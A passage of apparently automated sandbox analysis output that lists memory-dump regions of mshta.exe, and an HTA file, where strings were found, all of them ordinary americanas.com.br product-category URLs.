00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486497616.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387679114.000000000ABC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466141832.000000000ABC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/forno-eletrico?chave=pfm_hm_tt_1_0_forno-ele
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.000000000946C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/fritadeira-eletrica?chave=pfm_hm_tt_1_0_frit
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403823205.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444845667.0000000009564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25426074668.0000000009C1B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462978019.000000000B696000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460847777.000000000B657000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422689063.0000000009C1A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377202169.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489928071.000000000B699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/grill-e-sanduicheira?chave=pfm_hm_tt_1_0_gri
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460429722.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486497616.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400654336.000000000ABA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377309102.000000000AB99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/liquidificador?chave=pfm_hm_tt_1_0_liquidifi
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.000000000946C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/maquina-de-costura?chave=pfm_hm_tt_1_0_maqui
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378079621.000000000AB9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487748345.000000000ABA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489837872.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/mixer?chave=pfm_hm_tt_1_0_mixer
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490021991.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462814221.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383830981.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401236979.000000000A9B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458381198.000000000B6FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/processador-de-alimentos?chave=pfm_hm_tt_1_0
Source: mshta.exe, 00000000.00000003.25402097354.000000000AC33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465598138.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AA7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464016855.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401903465.000000000AC27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401838854.000000000AC13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis?chave=dk_hm_at_eletroportateis
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489837872.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401639777.000000000AC39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis?chave=pfm_hm_tt_1_0_portateis
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis?chave=pfm_hm_tt_1_0_portateis?
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432134093.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402044364.000000000ABF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.000000000946E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400942493.000000000ABD7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25436128428.0000000009C46000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis?chave=pfm_home_portateis_menu
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429899466.00000000067FB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25413137079.000000000C0F1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462689449.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422769315.00000000067FA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378079621.000000000AB9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25441872496.000000000C0F2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000677A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488630378.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25413034610.000000000C0F0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/enfeites-para-arvorea
Source: mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401236979.000000000A9B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/presepiox
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379542505.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459467924.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460957598.000000000AC7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464533482.000000000AC80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465519624.000000000AC82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488496284.000000000AC82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/toalha-de-mesa-natalina
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal/velas-e-casticais-natalinosE
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/enfeites-de-natal?chave=dk_hm_ats_2_11_natal%
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.000000000946E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405052073.000000000B734000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 